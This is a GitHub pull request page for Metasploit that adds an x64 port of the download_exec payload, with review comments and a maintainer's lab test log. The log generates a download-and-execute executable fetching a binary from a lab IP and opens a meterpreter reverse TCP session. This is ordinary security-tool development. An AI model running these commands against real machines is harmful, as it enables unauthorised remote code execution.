Skip to content

Port payload/windows/download_exec to x64 #20386

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 8 commits into from
Aug 13, 2025
Merged

Port payload/windows/download_exec to x64 #20386

merged 8 commits into from
Aug 13, 2025

Conversation

xHector1337
Copy link
Contributor

I have tried my best to port it from x86 to x64. It has some little problems that I can not see clearly.

@xHector1337 xHector1337 marked this pull request as draft July 15, 2025 13:53
@xHector1337
Copy link
Contributor Author

for some reason when running it with c, it crashes during URLDownloadToFileA function call.

@xHector1337
Copy link
Contributor Author

Problem likely lies in URLDownloadToFileA, as it is visible in the photo it calls URLDownloadToFileW in URLDownloadToFileA function and it somehow makes the executable crash.

image

@xHector1337
fix 5th arg for URLDownloadToFileA
0344591
@xHector1337
finalize the payload
90d15cb 
add CachedSize & fix the fifth arg problem & run rubocop
@xHector1337 xHector1337 marked this pull request as ready for review July 17, 2025 08:40
@dledda-r7 dledda-r7 self-assigned this Jul 17, 2025
@adfoster-r7
Copy link
Contributor

#20386 (comment)

@xHector1337 Were you able to resolve this issue? 👀

@xHector1337
Copy link
Contributor Author

#20386 (comment)

@xHector1337 Were you able to resolve this issue? 👀

Thanks, I was.

dledda-r7
dledda-r7 reviewed Aug 11, 2025
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code looks clean and correct, i'll give it a shot this week and if everything works i think we are good to go.

@xHector1337, can you please fix the linting issue?
rubocop -a modules/payloads/singles/windows/x64/download_exec.rb
Thanks!

@xHector1337
Copy link
Contributor Author

Code looks clean and correct, i'll give it a shot this week and if everything works i think we are good to go.

@xHector1337, can you please fix the linting issue? rubocop -a modules/payloads/singles/windows/x64/download_exec.rb Thanks!

Thank you, I'll be fixing it immediately.

OJ
OJ reviewed Aug 12, 2025
View reviewed changes
OJ
OJ reviewed Aug 12, 2025
View reviewed changes
dledda-r7
dledda-r7 reviewed Aug 12, 2025
View reviewed changes
dledda-r7
dledda-r7 reviewed Aug 12, 2025
View reviewed changes
@dledda-r7
Copy link
Contributor 

msf6 payload(windows/meterpreter/reverse_tcp) > use windows/x64/download_exec
msf6 payload(windows/x64/download_exec) > show options

Module options (payload/windows/x64/download_exec):

   Name      Current Setting          Required  Description
   ----      ---------------          --------  -----------
   DISPLAY   HIDE                     yes       The Display type. (Accepted: HIDE, SHOW)
   EXITFUNC  process                  yes       Exit technique (Accepted: '', seh, thread, process, none)
   FILEPATH  fox.exe                  yes       The path to save the downloaded file.
   URL       http://localhost/hi.exe  yes       The url to download the file from.


View the full module info with the info, or info -d command.

msf6 payload(windows/x64/download_exec) > set filepath m.exe
filepath => m.exe
msf6 payload(windows/x64/download_exec) > set url http://192.168.136.136:8000/metsrv.x64.exe
url => http://192.168.136.136:8000/metsrv.x64.exe
msf6 payload(windows/x64/download_exec) > generate -f exe -o ~/Public/download_exec.exe
[*] Writing 6656 bytes to ~/Public/download_exec.exe...
msf6 payload(windows/x64/download_exec) > use payload/windows/x64/meterpreter_reverse_tcp 
msf6 payload(windows/x64/meterpreter_reverse_tcp) > set lhost eth0
lhost => 192.168.136.136
msf6 payload(windows/x64/meterpreter_reverse_tcp) > to_handler
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
[*] Payload Handler Started as Job 1
msf6 payload(windows/x64/meterpreter_reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.136.136:4445 

msf6 payload(windows/x64/meterpreter_reverse_tcp) > generate -f exe -o ~/Public/metsrv.x64.exe
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
[*] Writing 569856 bytes to ~/Public/metsrv.x64.exe...
msf6 payload(windows/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 2 opened (192.168.136.136:4445 -> 192.168.136.138:55702) at 2025-08-12 05:47:25 -0400

msf6 payload(windows/x64/meterpreter_reverse_tcp) >

@dledda-r7 dledda-r7 merged commit eb003f7 into rapid7:master Aug 13, 2025
47 checks passed
@dledda-r7
Copy link
Contributor

dledda-r7 commented Aug 13, 2025
edited by mwalas-r7
Loading

Release Notes

This adds a new payload; the payload/windows/x64/download_execute can be used to download and execute a binary over http, with a reduced code size.

@dledda-r7 dledda-r7 added the rn-payload-enhancement release notes for enhanced payloads label Aug 13, 2025
@xHector1337 xHector1337 deleted the payload/windows/x64/download_exec branch August 13, 2025 11:39
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@OJ OJ OJ left review comments

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
payload rn-payload-enhancement release notes for enhanced payloads
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@xHector1337 @adfoster-r7 @dledda-r7 @OJ @smcintyre-r7